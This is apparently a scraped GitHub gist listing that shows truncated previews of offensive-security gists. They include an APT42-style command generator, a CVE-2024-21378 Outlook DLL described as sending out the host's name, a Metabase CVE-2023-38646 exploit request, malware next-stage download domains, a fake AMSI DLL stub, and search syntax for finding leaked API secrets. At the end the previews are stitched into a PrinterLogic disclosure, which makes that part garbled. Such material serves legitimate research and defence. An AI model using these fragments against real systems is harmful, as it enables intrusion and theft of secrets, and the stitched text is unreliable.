Ryota Sakai famasoon

## nicecurl.py
# https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/
import argparse
import random
import win32com.client

def insert_digit(word, digit):
    pos = random.randint(1, len(word) - 1)
    return word[:pos] + digit + word[pos:]

def generate_command(url, file_path):

## lsa-whisperer.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              3 stars
            
          
                EvanMcBroom
                / lsa-whisperer.md
            
            
              Last active
              April 27, 2024 19:33
            
              
                LSA Whisperer
              
          
    LSA Whisperer


Thank you to SpecterOps for supporting this research, to Elad for helping draft this blog, and to Sarah, Daniel, and Adam for proofreading and editing!
Crossposted on the SpecterOps Blog.

What follows is the culmination of two years of research with funding by SpecterOps and contributions from many of my coworkers.
Special thanks are needed to Elad, Lee, Will, Daniel, and Kai.
Elad, Lee, and Will have contributed several ideas to the project, which are documented here, and have each spent multiple days testing the tool.
Daniel has answered all of my inevitable questions about AzureAD (whoops, now Ent

  
## test_dll.c
/**
 *    This DLL is designed for use in conjunction with the Ruler tool for
 *    security testing related to the CVE-2024-21378 vulnerability,
 *    specifically targeting MS Outlook.
 *
 *    It can be used with the following command line syntax:
 *      ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 *    Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 *    After being loaded into MS Outlook, it sends the PC's hostname and

## objc_description.m
//
//  MIT License
//
//  Copyright (c) 2024 Derek Selander
//
//  Permission is hereby granted, free of charge, to any person obtaining a copy
//  of this software and associated documentation files (the "Software"), to deal
//  in the Software without restriction, including without limitation the rights
//  to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
//  copies of the Software, and to permit persons to whom the Software is

## DarkGate_Static_String_Decryption.py
import sys , pefile , validators , re , base64
'''
Author: Mohamed Ashraf (@X__Junior)

Usage:
python3 darkgate.py path_to_sample
'''

def is_ascii(s):
    return all(ord(c) < 128 or ord(c) == 0 for c in s)

## cve-2023-38646_poc.txt
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0
Connection: close

{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
"subprotocol":"h2",

## gist:f9748c3cae156b56a0751679085b3f8e
Next Stage Download Domains:

asuxtp.fun
bisiv.top
dubpv.top
eovze.fun
fyzyxe.top
igsufb.top
izrvb.top
lvuse.top

## GitHub-Leaked-API-Keys-and-Secrets.md

      
              1 file
            
          
              58 forks
            
          
              13 comments
            
          
              188 stars
            
          
                win3zz
                / GitHub-Leaked-API-Keys-and-Secrets.md
            
            
              Last active
              May 7, 2024 08:39
            
          
    GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.
Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))
Examples:

**1.

  
## fakeAmsiDll.cpp
// dllmain.cpp : Defines the entry point for the DLL application.

#include "pch.h"
#include <stdio.h>
#include <stdlib.h>

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

// generated with sharpdllproxy.

## Printerlogic-disclosure.md

      
              1 file
            
          
              1 fork
            
          
              1 comment
            
          
              2 stars
            
          
                wireghoul
                / Printerlogic-disclosure.md
            
            
              Last active
              May 27, 2023 23:24
            
              
                Printerlogic-disclosure
              
          
    PrinterLogic SaaS, multiple vulnerabilities

PrinterLogic's Enterprise Print Management software allows IT professionals to simplify printer driver management and empower end users.
-- https://www.printerlogic.com/
Background

The following findings were identified by performing both dynamic testing of the PrinterLogic SaaS platform and code analysis of the source code contained in the virtual appliance available for download from the PrinterLogic website (Build 1.0.757: July 29th, 2022).
	# https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/
	import argparse
	import random
	import win32com.client

	def insert_digit(word, digit):
	pos = random.randint(1, len(word) - 1)
	return word[:pos] + digit + word[pos:]

	def generate_command(url, file_path):
	/**
	* This DLL is designed for use in conjunction with the Ruler tool for
	* security testing related to the CVE-2024-21378 vulnerability,
	* specifically targeting MS Outlook.
	*
	* It can be used with the following command line syntax:
	* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
	* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
	*
	* After being loaded into MS Outlook, it sends the PC's hostname and
	//
	// MIT License
	//
	// Copyright (c) 2024 Derek Selander
	//
	// Permission is hereby granted, free of charge, to any person obtaining a copy
	// of this software and associated documentation files (the "Software"), to deal
	// in the Software without restriction, including without limitation the rights
	// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	// copies of the Software, and to permit persons to whom the Software is
	import sys , pefile , validators , re , base64
	'''
	Author: Mohamed Ashraf (@X__Junior)

	Usage:
	python3 darkgate.py path_to_sample
	'''

	def is_ascii(s):
	return all(ord(c) < 128 or ord(c) == 0 for c in s)
	POST /api/setup/validate HTTP/1.1
	Host: localhost:3000
	Content-Length: 416
	Accept: application/json
	Content-Type: application/json
	User-Agent: Mozilla/5.0
	Connection: close

	{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
	"subprotocol":"h2",
	Next Stage Download Domains:

	asuxtp.fun
	bisiv.top
	dubpv.top
	eovze.fun
	fyzyxe.top
	igsufb.top
	izrvb.top
	lvuse.top
	// dllmain.cpp : Defines the entry point for the DLL application.

	#include "pch.h"
	#include <stdio.h>
	#include <stdlib.h>

	#define _CRT_SECURE_NO_DEPRECATE
	#pragma warning (disable : 4996)

	// generated with sharpdllproxy.